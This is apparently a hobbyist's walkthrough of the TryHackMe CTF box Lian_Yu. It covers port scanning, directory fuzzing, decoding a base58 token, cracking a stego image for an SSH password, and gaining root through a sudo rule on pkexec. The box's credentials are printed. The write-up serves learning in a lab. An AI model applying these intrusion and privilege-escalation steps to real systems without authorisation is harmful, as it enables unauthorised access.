THM Lian_Yu

Introduction

Welcome to Lian_YU, this Arrowverse themed beginner CTF box! Capture the flags and have fun.

Normally I keep notes in Cherrytree. I’m going to try doing notes directly into Joplin as I work instead for this.

nmap

root@kali:/opt/tryhackme/lian_yu# nmap -p- -T4 10.10.156.179 -oA tcp_all_ports -vv

Results

Ports 21 (FTP), 22 (SSH), 80 (Webserver), 111 (unknown), 54272 (unknown). Google says Port 111 is probably RCP. We’ll get nmap to see if it knows.

Port 111

nmap says it’s rpcbind. Not sure if it’s important yet. Port 54272 also appears to be related to RPC.

root@kali:/opt/tryhackme/lian_yu# rpcinfo -p 10.10.156.179
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  44947  status
    100024    1   tcp  54272  status

I don’t think this is relevant.

FTP

Anonymous login not permitted.
nmap says: 21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.2 Searchsploit doesn’t list a vulnerability for this version, so presumably we’re going to need some credentials.

Webserver

Page title is Purgatory, and there is some content about the TV Series Arrow that doesn’t immediately appear relevant. No robots.txt. Server home is index.html, index.php is 404 so possibly not running PHP on the server. The 404 doesn’t leak any information about which server is running.

Changing the HTTP version and host header field in Burp Repeater didn’t do anything.

Gobuster

Try a gobuster with a basic wordlist:

root@kali:/opt/tryhackme/lian_yu# gobuster dir -u http://10.10.156.179 -w /usr/share/wordlists/dirb/common.txt

This didn’t turn up anything useful, so we’ll try again with a bigger wordlist (directory-list-lowercase-2.3-small.txt).

Gobuster turned up a page called ‘island’ with the following content: Ohhh Noo, Don’t Talk…………… I wasn’t Expecting You at this Moment. I will meet you there You should find a way to Lian_Yu as we are planed. The Code Word is: vigilante

Vigilante was written in a white font on the white background so it wasn’t readily visible.

Custom wordlist 1

Since ‘island’ was a term on the index.html page, I ran cewl to generate a list of words from that page to run against gobuster:

root@kali:/opt/tryhackme/lian_yu# /opt/cewl/cewl.rb -d 99 10.10.156.179 > cewlout.txt

But it didn’t find anything other than island.

Custom wordlist 2

I went to the Arrow Season 1 wikipedia page and copied all the text to a file and then manipulated it so I had one word per line. Then I removed the duplicates and punctuation (note I rm’d the original custom.txt after the first command here):

root@kali:/opt/tryhackme/lian_yu# sort custom.txt | uniq -u > filtered.txt
root@kali:/opt/tryhackme/lian_yu# cat filtered.txt | tr -d '[:punct:]' > custom.txt

But it didn’t find anything new either.

More fuzzing

Since I’m not getting anywhere with that, let’s try fuzzing inside island:

root@kali:/opt/tryhackme/lian_yu# wfuzz --hc 404 -u http://10.10.156.179/island/FUZZ/ -w /usr/share/wordlists/dirb/common.txt 

Success: http://10.10.156.179/island/2100/

There is a hint in the page source: you can avail your .ticket here but how?

root@kali:/opt/tryhackme/lian_yu# gobuster dir -u http://10.10.62.128/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ticket

This turned up: http://10.10.62.128/island/2100/green_arrow.ticket Which contained: This is just a token to get into Queen’s Gambit(Ship) RTy8yhBQdscX

This looks like base64, but it’s actually base58. And it decodes to !#th3h00d, which we can use for the FTP service.

FTP Again

The credentials we’ve gathered are ‘vigilante:!#th3h00d’, which gives us access to three images, so probably stego.
Poking around in the FTP directory we can go up a level and find there is another user called ‘slade’.

Stego/SSH

I hate stego. I threw stegcracker at aa.jpg and it cracked with ‘password’ and I got a file with the word ‘M3tahuman’ in it; as it turns out this is the SSH password for slade.

Privesc

Very straightforward:

slade@LianYu:~$ sudo -l
[sudo] password for slade: 
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ sudo /usr/bin/pkexec /bin/bash
root@LianYu:~# ls
root.txt
root@LianYu:~# cat root.txt
                          Mission accomplished